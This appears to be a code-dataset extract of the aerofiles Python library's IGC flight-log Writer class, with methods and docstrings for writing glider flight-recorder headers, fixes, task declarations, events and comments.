        raise ValueError('Invalid number of parameters received')

    if time is None:
        time = datetime.datetime.utcnow()

    record = self.format_time(time)

    # extension values may only be given together with a declaration
    if not (isinstance(extensions, list) and
            isinstance(self.k_record_extensions, list)):
        raise ValueError('Invalid extensions list')

    if len(extensions) != len(self.k_record_extensions):
        raise ValueError(
            'Number of extensions does not match declaration')

    for (_, length), value in zip(self.k_record_extensions, extensions):
        # numbers are zero-padded to the declared field width
        if isinstance(value, (int, float)):
            value = ('%0' + str(length) + 'd') % value

        if len(value) != length:
            raise ValueError('Extension value has wrong length')

        record += value

    self.write_record('K', record)
def write_comment(self, code, text):
    """
    Write an L (comment) record::

        writer.write_comment('PLT', 'Arrived at the first turnpoint')
        # -> LPLTArrived at the first turnpoint

    :param code: a three-letter-code describing the source of the comment
        (e.g. ``PLT`` for pilot)
    :param text: the text that should be added to the comment
    """
    if patterns.THREE_LETTER_CODE.match(code) is None:
        raise ValueError('Invalid source')
    self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_task_points | python | def write_task_points(self, points):
for args in points:
if len(args) not in [3, 7]:
raise ValueError('Invalid number of task point tuple items')
self.write_task_point(*args) | Write multiple task declaration points with one call::
writer.write_task_points([
(None, None, 'TAKEOFF'),
(51.40375, 6.41275, 'START'),
(50.38210, 8.82105, 'TURN 1'),
(50.59045, 7.03555, 'TURN 2', 0, 32.5, 0, 180),
(51.40375, 6.41275, 'FINISH'),
(None, None, 'LANDING'),
])
# -> C0000000N00000000ETAKEOFF
# -> C5124225N00624765ESTART
# -> C5022926N00849263ETURN 1
# -> C5035427N00702133E00000000032500000000180000TURN 2
# -> C5124225N00624765EFINISH
# -> C0000000N00000000ELANDING
see the :meth:`~aerofiles.igc.Writer.write_task_point` method for more
information.
:param points: a list of ``(latitude, longitude, text)`` tuples. use
``(latitude, longitude, text, distance_min, distance_max, bearing1,
bearing2)`` tuples for area task points. | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L609-L639 | [
"def write_task_point(self, latitude=None, longitude=None, text='',\n distance_min=None, distance_max=None,\n bearing1=None, bearing2=None):\n \"\"\"\n Write a task declaration point::\n\n writer.write_task_point(\n latitude=(51 + 7.345 / 60.),\n ... | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
def write_fr_header(self, subtype, value,
subtype_long=None, value_long=None):
self.write_header(
'F', subtype, value,
subtype_long=subtype_long, value_long=value_long
)
def write_date(self, date):
"""
Write the date header::
writer.write_date(datetime.date(2014, 5, 2))
# -> HFDTE140502
:param date: a :class:`datetime.date` instance
"""
self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
def write_headers(self, headers):
"""
Write all the necessary headers in the correct order::
writer.write_headers({
'manufacturer_code': 'XCS',
'logger_id': 'TBX',
'date': datetime.date(1987, 2, 24),
'fix_accuracy': 50,
'pilot': 'Tobias Bieniek',
'copilot': 'John Doe',
'glider_type': 'Duo Discus',
'glider_id': 'D-KKHH',
'firmware_version': '2.2',
'hardware_version': '2',
'logger_type': 'LXNAVIGATION,LX8000F',
'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
'competition_id': '2H',
'competition_class': 'Doubleseater',
})
# -> AXCSTBX
# -> HFDTE870224
# -> HFFXA050
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
# -> HFCM2CREW2:John Doe
# -> HFGTYGLIDERTYPE:Duo Discus
# -> HFGIDGLIDERID:D-KKHH
# -> HFDTM100GPSDATUM:WGS-1984
# -> HFRFWFIRMWAREVERSION:2.2
# -> HFRHWHARDWAREVERSION:2
# -> HFFTYFRTYPE:LXNAVIGATION,LX8000F
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
# -> HFPRSPRESSALTSENSOR:INTERSEMA,MS5534A,max10000m
# -> HFCIDCOMPETITIONID:2H
# -> HFCCLCOMPETITIONCLASS:Doubleseater
This method will throw a :class:`ValueError` if a mandatory header is
missing and will fill others up with empty strings if no value was
given. The optional headers are only written if they are part of the
specified :class:`dict`.
.. admonition:: Note
The use of this method is encouraged compared to calling all the
other header-writing methods manually!
:param headers: a :class:`dict` of all the headers that should be
written.
"""
for header in self.REQUIRED_HEADERS:
if header not in headers:
raise ValueError('%s header missing' % header)
self.write_logger_id(
headers['manufacturer_code'],
headers['logger_id'],
extension=headers.get('logger_id_extension')
)
self.write_date(headers['date'])
self.write_fix_accuracy(headers.get('fix_accuracy'))
self.write_pilot(headers.get('pilot', ''))
if 'copilot' in headers:
self.write_copilot(headers['copilot'])
self.write_glider_type(headers.get('glider_type', ''))
self.write_glider_id(headers.get('glider_id', ''))
self.write_gps_datum(
code=headers.get('gps_datum_code'),
gps_datum=headers.get('gps_datum'),
)
self.write_firmware_version(headers.get('firmware_version', ''))
self.write_hardware_version(headers.get('hardware_version', ''))
self.write_logger_type(headers['logger_type'])
self.write_gps_receiver(headers['gps_receiver'])
self.write_pressure_sensor(headers.get('pressure_sensor', ''))
if 'competition_id' in headers:
self.write_competition_id(headers['competition_id'])
if 'competition_class' in headers:
self.write_competition_class(headers['competition_class'])
if 'club' in headers:
self.write_club(headers['club'])
def write_extensions(self, type, start_byte, extensions):
num_extensions = len(extensions)
if num_extensions >= 100:
raise ValueError('Too many extensions')
record = '%02d' % num_extensions
for extension, length in extensions:
if not patterns.EXTENSION_CODE.match(extension):
raise ValueError('Invalid extension: %s' % extension)
end_byte = start_byte + length - 1
record += '%02d%02d%s' % (start_byte, end_byte, extension)
start_byte = start_byte + length
self.write_record(type, record)
def write_fix_extensions(self, extensions):
"""
Write the fix extensions description header::
writer.write_fix_extensions([('FXA', 3), ('SIU', 2), ('ENL', 3)])
# -> I033638FXA3940SIU4143ENL
:param extensions: a list of ``(extension, length)`` tuples
"""
self.fix_extensions = extensions
self.write_extensions('I', 36, extensions)
def write_k_record_extensions(self, extensions):
"""
Write the K record extensions description header::
writer.write_k_record_extensions([('HDT', 5)])
# -> J010812HDT
Use :meth:`~aerofiles.igc.Writer.write_k_record` to write the
associated records.
:param extensions: a list of ``(extension, length)`` tuples
"""
self.k_record_extensions = extensions
self.write_extensions('J', 8, extensions)
def write_task_metadata(
self, declaration_datetime=None, flight_date=None,
task_number=None, turnpoints=None, text=None):
"""
Write the task declaration metadata record::
writer.write_task_metadata(
datetime.datetime(2014, 4, 13, 12, 53, 02),
task_number=42,
turnpoints=3,
)
# -> C140413125302000000004203
There are sensible defaults in place for all parameters except for the
``turnpoints`` parameter. If you don't pass that parameter the method
will raise a :class:`ValueError`. The other parameter defaults are
mentioned in the list below.
:param declaration_datetime: a :class:`datetime.datetime` instance of
the UTC date and time at the time of declaration (default: current
date and time)
:param flight_date: a :class:`datetime.date` instance of the intended
date of the flight (default: ``000000``, which means "use
declaration date")
:param task_number: task number for the flight date or an integer-based
identifier (default: ``0001``)
:param turnpoints: the number of turnpoints in the task (not counting
start and finish points!)
:param text: optional text to append to the metadata record
"""
if declaration_datetime is None:
declaration_datetime = datetime.datetime.utcnow()
if isinstance(declaration_datetime, datetime.datetime):
declaration_datetime = (
self.format_date(declaration_datetime) +
self.format_time(declaration_datetime)
)
elif not patterns.DATETIME.match(declaration_datetime):
raise ValueError('Invalid declaration datetime: %s' %
declaration_datetime)
if flight_date is None:
flight_date = '000000'
else:
flight_date = self.format_date(flight_date)
if task_number is None:
task_number = 1
elif not isinstance(task_number, int):
raise ValueError('Invalid task number: %s' % task_number)
if not isinstance(turnpoints, int):
raise ValueError('Invalid turnpoints: %s' % turnpoints)
record = '{0}{1}{2:04d}{3:02d}'.format(
declaration_datetime,
flight_date,
task_number,
turnpoints,
)
if text:
record += text
self.write_record('C', record)
def write_task_point(self, latitude=None, longitude=None, text='',
distance_min=None, distance_max=None,
bearing1=None, bearing2=None):
"""
Write a task declaration point::
writer.write_task_point(
latitude=(51 + 7.345 / 60.),
longitude=(6 + 24.765 / 60.),
text='Meiersberg',
)
# -> C5107345N00624765EMeiersberg
If no ``latitude`` or ``longitude`` is passed, the fields will be
filled with zeros (i.e. unknown coordinates). This however should only
be used for ``TAKEOFF`` and ``LANDING`` points.
For area tasks there are some additional parameters that can be used
to specify the relevant areas::
writer.write_task_point(
-(12 + 32.112 / 60.),
-(178 + .001 / 60.),
'TURN AREA',
distance_min=12.0,
distance_max=32.0,
bearing1=122.0,
bearing2=182.0,
)
# -> C1232112S17800001W00120000032000122000182000TURN AREA
:param latitude: latitude of the point (between -90 and 90 degrees)
:param longitude: longitude of the point (between -180 and 180 degrees)
:param text: type and/or name of the waypoint (e.g. ``TAKEOFF``,
``START``, ``TURN 1``, ``TURN 2``, ``FINISH`` or ``LANDING``)
"""
latitude = self.format_latitude(latitude)
longitude = self.format_longitude(longitude)
record = latitude + longitude
if None not in [distance_min, distance_max, bearing1, bearing2]:
record += '%04d' % int(distance_min)
record += '%03d' % int((distance_min - int(distance_min)) * 1000)
record += '%04d' % int(distance_max)
record += '%03d' % int((distance_max - int(distance_max)) * 1000)
record += '%03d' % int(bearing1)
record += '%03d' % int((bearing1 - int(bearing1)) * 1000)
record += '%03d' % int(bearing2)
record += '%03d' % int((bearing2 - int(bearing2)) * 1000)
if text:
record += text
self.write_record('C', record)
def write_security(self, security, bytes_per_line=75):
"""
Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``)
"""
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line])
def write_fix(self, time=None, latitude=None, longitude=None, valid=False,
pressure_alt=None, gps_alt=None, extensions=None):
"""
Write a fix record::
writer.write_fix(
datetime.time(12, 34, 56),
latitude=51.40375,
longitude=6.41275,
valid=True,
pressure_alt=1234,
gps_alt=1432,
)
# -> B1234565124225N00624765EA0123401432
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param latitude: longitude of the last GPS fix
:param longitude: latitude of the last GPS fix
:param valid: ``True`` if the current GPS fix is 3D
:param pressure_alt: altitude to the ICAO ISA above the 1013.25 hPa
sea level datum
:param gps_alt: altitude above the WGS84 ellipsoid
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_fix_extensions`
"""
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
record += self.format_latitude(latitude)
record += self.format_longitude(longitude)
record += 'A' if valid else 'V'
record += '%05d' % (pressure_alt or 0)
record += '%05d' % (gps_alt or 0)
if self.fix_extensions or extensions:
if not (isinstance(extensions, list) and
isinstance(self.fix_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.fix_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.fix_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('B', record)
def write_event(self, *args):
"""
Write an event record::
writer.write_event(datetime.time(12, 34, 56), 'PEV')
# -> B123456PEV
writer.write_event(datetime.time(12, 34, 56), 'PEV', 'Some Text')
# -> B123456PEVSome Text
writer.write_event('PEV') # uses utcnow()
# -> B121503PEV
:param time: UTC time of the fix record (default:
:meth:`~datetime.datetime.utcnow`)
:param code: event type as three-letter-code
:param text: additional text describing the event (optional)
"""
num_args = len(args)
if not (1 <= num_args <= 3):
raise ValueError('Invalid number of parameters received')
if num_args == 3:
time, code, text = args
elif num_args == 1:
code = args[0]
time = text = None
elif isinstance(args[0], (datetime.time, datetime.datetime)):
time, code = args
text = None
else:
code, text = args
time = None
if time is None:
time = datetime.datetime.utcnow()
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid event code')
record = self.format_time(time)
record += code
if text:
record += text
self.write_record('E', record)
def write_satellites(self, *args):
"""
Write a satellite constellation record::
writer.write_satellites(datetime.time(12, 34, 56), [1, 2, 5, 22])
# -> F12345601020522
:param time: UTC time of the satellite constellation record (default:
:meth:`~datetime.datetime.utcnow`)
:param satellites: a list of satellite IDs as either two-character
strings or integers below 100
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
satellites = args[0]
time = None
else:
time, satellites = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
for satellite in satellites:
if isinstance(satellite, int):
satellite = '%02d' % satellite
if len(satellite) != 2:
raise ValueError('Invalid satellite ID')
record += satellite
self.write_record('F', record)
def write_k_record(self, *args):
"""
Write a K record::
writer.write_k_record_extensions([
('FXA', 3), ('SIU', 2), ('ENL', 3),
])
writer.write_k_record(datetime.time(2, 3, 4), ['023', 13, 2])
# -> J030810FXA1112SIU1315ENL
# -> K02030402313002
:param time: UTC time of the k record (default:
:meth:`~datetime.datetime.utcnow`)
:param extensions: a list of extension values according to previous
declaration through
:meth:`~aerofiles.igc.Writer.write_k_record_extensions`
"""
num_args = len(args)
if num_args not in (1, 2):
raise ValueError('Invalid number of parameters received')
if num_args == 1:
extensions = args[0]
time = None
else:
time, extensions = args
if time is None:
time = datetime.datetime.utcnow()
record = self.format_time(time)
if not (isinstance(extensions, list) and
isinstance(self.k_record_extensions, list)):
raise ValueError('Invalid extensions list')
if len(extensions) != len(self.k_record_extensions):
raise ValueError(
'Number of extensions does not match declaration')
for type_length, value in zip(self.k_record_extensions, extensions):
length = type_length[1]
if isinstance(value, (int, float)):
value = ('%0' + str(length) + 'd') % value
if len(value) != length:
raise ValueError('Extension value has wrong length')
record += value
self.write_record('K', record)
def write_comment(self, code, text):
"""
Write a comment record::
writer.write_comment('PLT', 'Arrived at the first turnpoint')
# -> LPLTArrived at the first turnpoint
:param code: a three-letter-code describing the source of the comment
(e.g. ``PLT`` for pilot)
:param text: the text that should be added to the comment
"""
if not patterns.THREE_LETTER_CODE.match(code):
raise ValueError('Invalid source')
self.write_record('L', code + text)
|
Turbo87/aerofiles | aerofiles/igc/writer.py | Writer.write_security | python | def write_security(self, security, bytes_per_line=75):
for start in range(0, len(security), bytes_per_line):
self.write_record('G', security[start:start + bytes_per_line]) | Write the security signature::
writer.write_security('ABCDEF')
# -> GABCDEF
If a signature of more than 75 bytes is used the G record will be
broken into multiple lines according to the IGC file specification.
This rule can be configured with the ``bytes_per_line`` parameter if
necessary.
:param security: the security signature
:param bytes_per_line: the maximum number of bytes per line
(default: ``75``) | train | https://github.com/Turbo87/aerofiles/blob/d8b7b04a1fcea5c98f89500de1164619a4ec7ef4/aerofiles/igc/writer.py#L641-L659 | [
"def write_record(self, type, record):\n self.write_line(type + record)\n"
] | class Writer:
"""
A writer for the IGC flight log file format.
"""
REQUIRED_HEADERS = [
'manufacturer_code',
'logger_id',
'date',
'logger_type',
'gps_receiver',
]
def __init__(self, fp=None):
self.fp = fp
self.fix_extensions = None
self.k_record_extensions = None
def format_date(self, date):
if isinstance(date, datetime.datetime):
date = date.date()
if isinstance(date, datetime.date):
date = date.strftime('%d%m%y')
if not patterns.DATE.match(date):
raise ValueError("Invalid date: " + date)
return date
def format_time(self, time):
if isinstance(time, datetime.datetime):
time = time.time()
if isinstance(time, datetime.time):
time = time.strftime('%H%M%S')
if not patterns.TIME.match(time):
raise ValueError("Invalid time: " + time)
return time
def format_coordinate(self, value, default=None, is_latitude=True):
if value is None:
return default
if is_latitude:
if not -90 <= value <= 90:
raise ValueError('Invalid latitude: %s' % value)
hemisphere = 'S' if value < 0 else 'N'
format = '%02d%05d%s'
else:
if not -180 <= value <= 180:
raise ValueError('Invalid longitude: %s' % value)
hemisphere = 'W' if value < 0 else 'E'
format = '%03d%05d%s'
value = abs(value)
degrees = int(value)
milliminutes = round((value - degrees) * 60000)
return format % (degrees, milliminutes, hemisphere)
def format_latitude(self, value):
return self.format_coordinate(
value, default='0000000N', is_latitude=True)
def format_longitude(self, value):
return self.format_coordinate(
value, default='00000000E', is_latitude=False)
def write_line(self, line):
self.fp.write((line + u'\r\n').encode('ascii', 'replace'))
def write_record(self, type, record):
self.write_line(type + record)
def write_logger_id(self, manufacturer, logger_id, extension=None,
validate=True):
"""
Write the manufacturer and logger id header line::
writer.write_logger_id('XXX', 'ABC', extension='FLIGHT:1')
# -> AXXXABCFLIGHT:1
Some older loggers have decimal logger ids which can be written like
this::
writer.write_logger_id('FIL', '13961', validate=False)
# -> AFIL13961
:param manufacturer: the three-letter-code of the manufacturer
:param logger_id: the logger id as three-letter-code
:param extension: anything else that should be appended to this header
(e.g. ``FLIGHT:1``)
:param validate: whether to validate the manufacturer and logger_id
three-letter-codes
"""
if validate:
if not patterns.MANUFACTURER_CODE.match(manufacturer):
raise ValueError('Invalid manufacturer code')
if not patterns.LOGGER_ID.match(logger_id):
raise ValueError('Invalid logger id')
record = '%s%s' % (manufacturer, logger_id)
if extension:
record = record + extension
self.write_record('A', record)
def write_header(self, source, subtype, value,
subtype_long=None, value_long=None):
if source not in ('F', 'O'):
raise ValueError('Invalid source: %s' % source)
if not subtype_long:
record = '%s%s%s' % (source, subtype, value)
elif not value_long:
record = '%s%s%s:%s' % (source, subtype, subtype_long, value)
else:
record = '%s%s%s%s:%s' % \
(source, subtype, value, subtype_long, value_long)
self.write_record('H', record)
    def write_fr_header(self, subtype, value,
                        subtype_long=None, value_long=None):
        # Convenience wrapper: all flight-recorder headers use source 'F'.
        self.write_header(
            'F', subtype, value,
            subtype_long=subtype_long, value_long=value_long
        )
    def write_date(self, date):
        """
        Write the date header::

            writer.write_date(datetime.date(2014, 5, 2))
            # -> HFDTE020514

        The date is encoded as ``DDMMYY`` by :meth:`format_date`.

        :param date: a :class:`datetime.date` instance
        """
        self.write_fr_header('DTE', self.format_date(date))
def write_fix_accuracy(self, accuracy=None):
"""
Write the GPS fix accuracy header::
writer.write_fix_accuracy()
# -> HFFXA500
writer.write_fix_accuracy(25)
# -> HFFXA025
:param accuracy: the estimated GPS fix accuracy in meters (optional)
"""
if accuracy is None:
accuracy = 500
accuracy = int(accuracy)
if not 0 < accuracy < 1000:
raise ValueError('Invalid fix accuracy')
self.write_fr_header('FXA', '%03d' % accuracy)
def write_pilot(self, pilot):
"""
Write the pilot declaration header::
writer.write_pilot('Tobias Bieniek')
# -> HFPLTPILOTINCHARGE:Tobias Bieniek
:param pilot: name of the pilot
"""
self.write_fr_header('PLT', pilot, subtype_long='PILOTINCHARGE')
def write_copilot(self, copilot):
"""
Write the copilot declaration header::
writer.write_copilot('John Doe')
# -> HFCM2CREW2:John Doe
:param copilot: name of the copilot
"""
self.write_fr_header('CM2', copilot, subtype_long='CREW2')
def write_glider_type(self, glider_type):
"""
Write the glider type declaration header::
writer.write_glider_type('Hornet')
# -> HFGTYGLIDERTYPE:Hornet
:param glider_type: the glider type (e.g. ``Hornet``)
"""
self.write_fr_header('GTY', glider_type, subtype_long='GLIDERTYPE')
def write_glider_id(self, glider_id):
"""
Write the glider id declaration header::
writer.write_glider_id('D-4449')
# -> HFGIDGLIDERID:D-4449
The glider id is usually the official registration number of the
airplane. For example:``D-4449`` or ``N116EL``.
:param glider_id: the glider registration number
"""
self.write_fr_header('GID', glider_id, subtype_long='GLIDERID')
def write_gps_datum(self, code=None, gps_datum=None):
"""
Write the mandatory GPS datum header::
writer.write_gps_datum()
# -> HFDTM100GPSDATUM:WGS-1984
writer.write_gps_datum(33, 'Guam-1963')
# -> HFDTM033GPSDATUM:Guam-1963
Note that the default GPS datum is WGS-1984 and you should use that
unless you have very good reasons against it.
:param code: the GPS datum code as defined in the IGC file
specification, section A8
:param gps_datum: the GPS datum in written form
"""
if code is None:
code = 100
if gps_datum is None:
gps_datum = 'WGS-1984'
self.write_fr_header(
'DTM',
'%03d' % code,
subtype_long='GPSDATUM',
value_long=gps_datum,
)
def write_firmware_version(self, firmware_version):
"""
Write the firmware version header::
writer.write_firmware_version('6.4')
# -> HFRFWFIRMWAREVERSION:6.4
:param firmware_version: the firmware version of the flight recorder
"""
self.write_fr_header(
'RFW', firmware_version, subtype_long='FIRMWAREVERSION')
def write_hardware_version(self, hardware_version):
"""
Write the hardware version header::
writer.write_hardware_version('1.2')
# -> HFRHWHARDWAREVERSION:1.2
:param hardware_version: the hardware version of the flight recorder
"""
self.write_fr_header(
'RHW', hardware_version, subtype_long='HARDWAREVERSION')
def write_logger_type(self, logger_type):
"""
Write the extended logger type header::
writer.write_logger_type('Flarm-IGC')
# -> HFFTYFRTYPE:Flarm-IGC
:param logger_type: the extended type information of the flight
recorder
"""
self.write_fr_header('FTY', logger_type, subtype_long='FRTYPE')
def write_gps_receiver(self, gps_receiver):
"""
Write the GPS receiver header::
writer.write_gps_receiver('uBLOX LEA-4S-2,16,max9000m')
# -> HFGPSuBLOX LEA-4S-2,16,max9000m
:param gps_receiver: the GPS receiver information
"""
self.write_fr_header('GPS', gps_receiver)
def write_pressure_sensor(self, pressure_sensor):
"""
Write the pressure sensor header::
writer.write_pressure_sensor('Intersema MS5534B,8191')
# -> HFPRSPRESSALTSENSOR:Intersema MS5534B,8191
:param pressure_sensor: the pressure sensor information
"""
self.write_fr_header(
'PRS', pressure_sensor, subtype_long='PRESSALTSENSOR')
def write_competition_id(self, competition_id):
"""
Write the optional competition id declaration header::
writer.write_competition_id('TH')
# -> HFCIDCOMPETITIONID:TH
:param competition_id: competition id of the glider
"""
self.write_fr_header(
'CID', competition_id, subtype_long='COMPETITIONID')
def write_competition_class(self, competition_class):
"""
Write the optional competition class declaration header::
writer.write_competition_class('Club')
# -> HFCCLCOMPETITIONCLASS:Club
:param competition_class: competition class of the glider
"""
self.write_fr_header(
'CCL', competition_class, subtype_long='COMPETITIONCLASS')
def write_club(self, club):
"""
Write the optional club declaration header::
writer.write_club('LV Aachen')
# -> HFCLBCLUB:LV Aachen
:param club: club or organisation for which this flight should be
scored
"""
self.write_fr_header('CLB', club, subtype_long='CLUB')
    def write_headers(self, headers):
        """
        Write all the necessary headers in the correct order::

            writer.write_headers({
                'manufacturer_code': 'XCS',
                'logger_id': 'TBX',
                'date': datetime.date(1987, 2, 24),
                'fix_accuracy': 50,
                'pilot': 'Tobias Bieniek',
                'copilot': 'John Doe',
                'glider_type': 'Duo Discus',
                'glider_id': 'D-KKHH',
                'firmware_version': '2.2',
                'hardware_version': '2',
                'logger_type': 'LXNAVIGATION,LX8000F',
                'gps_receiver': 'uBLOX LEA-4S-2,16,max9000m',
                'pressure_sensor': 'INTERSEMA,MS5534A,max10000m',
                'competition_id': '2H',
                'competition_class': 'Doubleseater',
            })

            # -> AXCSTBX
            # -> HFDTE240287
            # -> HFFXA050
            # -> HFPLTPILOTINCHARGE:Tobias Bieniek
            # -> HFCM2CREW2:John Doe
            # -> HFGTYGLIDERTYPE:Duo Discus
            # -> HFGIDGLIDERID:D-KKHH
            # -> HFDTM100GPSDATUM:WGS-1984
            # -> HFRFWFIRMWAREVERSION:2.2
            # -> HFRHWHARDWAREVERSION:2
